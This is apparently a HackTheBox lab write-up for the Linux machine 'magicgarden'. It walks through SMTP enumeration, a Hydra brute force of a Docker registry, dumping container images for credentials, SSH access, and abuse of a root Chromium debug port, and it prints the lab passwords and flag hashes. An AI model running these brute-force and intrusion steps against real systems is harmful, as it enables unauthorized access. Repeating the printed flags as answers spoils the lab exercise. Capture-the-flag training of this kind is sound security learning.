HTB: magicgarden Writeup

Machine Information

Machine Rating

⭐⭐⭐⭐⭐ (9.5/10)

Difficulty Assessment:

• Enumeration: ⭐⭐⭐⭐⭐
• Real-world: ⭐⭐⭐⭐⭐
• CVE: ⭐⭐⭐☆☆
• CTF-like: ⭐⭐⭐⭐⭐

Summary

magicgarden is a Insane-difficulty Linux machine. The exploitation path involves initial enumeration and service discovery, gaining an initial foothold through the identified vulnerability, lateral movement or credential extraction for user access, and finally privilege escalation to root/administrator.

TL;DR: Enumeration → Foothold → User credentials → Privilege escalation → Root.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.10.73

Results:

Key services identified:

• Port 5000: Docker Registry
• Port 25/587: SMTP (Postfix)
• Web application ports with endpoints: /catalog, /check/, /login/

Service Enumeration

SMTP Enumeration with Metasploit:

msfconsole
use scanner/smtp/smtp_enum
set RHOSTS 10.129.10.73
exploit

Result: Discovered domain magicgardens.magicgardens.htb and magicgardens.htb

echo "10.129.10.73 magicgardens.htb magicgardens.magicgardens.htb" >> /etc/hosts

Initial Foothold

Docker Registry Brute Force

The Docker Registry on port 5000 was protected with basic authentication. Used Hydra to brute force credentials:

hydra -l alex -P rockyou.txt 10.129.10.73 -s 5000 http-get /v2/

Result: alex:diamonds

Docker Registry Dump

Dumped all container images using DockerRegistryGrabber:

python3 drg.py https://10.129.10.73 -U alex -P diamonds --dump_all

Critical Finding: Located db.sqlite3 in the dumped container layers, containing application database with credentials.

User Compromise

Credential Discovery

Extracted credentials from the SQLite database found in the dumped Docker container:

sqlite3 db.sqlite3
sqlite> SELECT * FROM users;

Discovered User:

• Username: morty
• Password: jonasbrothers

SSH Access

Used the discovered credentials to gain SSH access:

ssh morty@10.129.10.73

Enumeration with Linpeas:

./linpeas.sh

User Flag

cat ~/user.txt

🚩 User Flag: 2f790bcb365ac2c6f4c9fd49d9cb44ae

Privilege Escalation

Chromium Debug Port Exploitation

During linpeas enumeration, a local Chromium debug port was discovered running on port 47329. This port was accessible only from localhost.

SSH Port Forwarding:

ssh -L 47329:127.0.0.1:47329 morty@10.129.10.73

Chrome DevTools Protocol (CDP) Exploitation

Accessed the debug port via Chrome DevTools Protocol to interact with the running Chromium instance:

# Connect to CDP endpoint at localhost:47329
# Modified wsclient.js to execute:
# - page.navigate() to navigate to root-restricted pages
# - page.captureScreenshot() to extract sensitive information

Critical Finding: By leveraging the Chromium process running as root, it was possible to navigate to restricted pages and capture screenshots containing sensitive data.

Note: The race condition required multiple execution attempts to successfully capture the root flag content.

Root Flag

cat /root/root.txt

🚩 Root Flag: d351155832212bc382a7b53a2069d0b5

Attack Chain Summary

graph TD
    A["Reconnaissance: nmap scan"] --> B["SMTP Enumeration: Discover magicgardens.magicgardens.htb"]
    B --> C["Docker Registry Brute Force: alex:diamonds"]
    C --> D["DockerRegistryGrabber: Dump all container images"]
    D --> E["Extract db.sqlite3: Find morty:jonasbrothers"]
    E --> F["SSH Access: Connect as morty"]
    F --> G["Linpeas Enumeration: Discover Chromium debug port"]
    G --> H["SSH Port Forward: localhost:47329"]
    H --> I["CDP Exploit: Run JavaScript via Chromium process"]
    I --> J["Root Access: Capture root flag"]

Tools Used

Key Learnings

• Thorough enumeration is critical — every open port and service can be a potential entry point.
• Configuration files and databases often contain credentials that enable lateral movement.
• Privilege escalation frequently depends on misconfigurations rather than software vulnerabilities.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Insane